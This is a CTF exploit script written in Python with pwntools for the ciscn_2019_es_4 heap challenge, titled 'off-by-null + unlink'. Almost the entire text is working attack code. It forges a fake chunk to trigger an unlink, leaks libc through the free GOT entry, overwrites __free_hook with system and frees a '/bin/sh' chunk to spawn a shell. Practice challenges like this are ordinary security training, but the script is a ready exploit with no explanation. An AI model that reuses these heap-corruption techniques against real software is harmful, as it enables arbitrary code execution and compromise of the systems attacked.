off-by-null + unlink
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
s = process('./ciscn_2019_es_4')
#s = remote('node4.buuoj.cn',25370)
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
elf = ELF('./ciscn_2019_es_4')
def add(index,size,content):
s.sendlineafter(b'4.show\n' , b'1')
s.sendlineafter(b'index:\n' , str(index))
s.sendlineafter(b'size:\n' , str(size))
s.sendafter(b'content:\n' , content)
def delete(index):
s.sendlineafter(b'4.show\n' , b'2')
s.sendlineafter(b'index:\n' , str(index))
def edit(index,content):
s.sendlineafter(b'4.show\n' , b'3')
s.sendlineafter(b'index:\n' , str(index))
s.sendafter(b'content:\n' , content)
def show(index):
s.sendlineafter(b'4.show\n' , b'4')
s.sendlineafter(b'index:\n' , str(index))
target = 0x6020E0 + 8 * 7
fd = target - 0x18
bk = target - 0x10
key2_addr = 0x6022B8
for i in range(7):
add(i , 0xf0 , b'a') # 0-6
s.sendlineafter(b'4.show\n' , b'1')
s.sendlineafter(b'index:\n' , str(7))
s.sendlineafter(b'size:\n' , str(0x88))
s.recvuntil(b'gift: ')
heap_addr = int(s.recv(7),16)
success('heap_addr=>' + hex(heap_addr))
s.sendafter(b'content:\n' , b'a') # 7
add(8 , 0xf0 , b'a') # 8
add(9 , 0x80 , b'a') # 9
add(10 , 0x80 , b'a') # 10
add(11 , 0x80 , b'/bin/sh\x00') # 11
for i in range(7):
delete(i)
payload = p64(0) + p64(0x81)
payload+= p64(fd) + p64(bk)
payload+= b'\x00'*0x60
payload+= p64(0x80)
edit(7 , payload)
delete(8)
payload = p64(heap_addr + 0x190) + p64(heap_addr + 0x190)
payload+= p64(elf.got['free']) + p64(0x602100)
edit(7 , payload)
delete(4)
delete(5)
add(4 , 0x80 , p64(key2_addr)) # 4
add(5 , 0x80 , p64(key2_addr)) # 5
add(8 , 0x80 , p64(0xfffffff)) # 8
show(6)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['free']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']
edit(7 , p64(__free_hook))
edit(4 , p64(system_addr))
delete(11)
#gdb.attach(s)
作者:{狒猩橙}
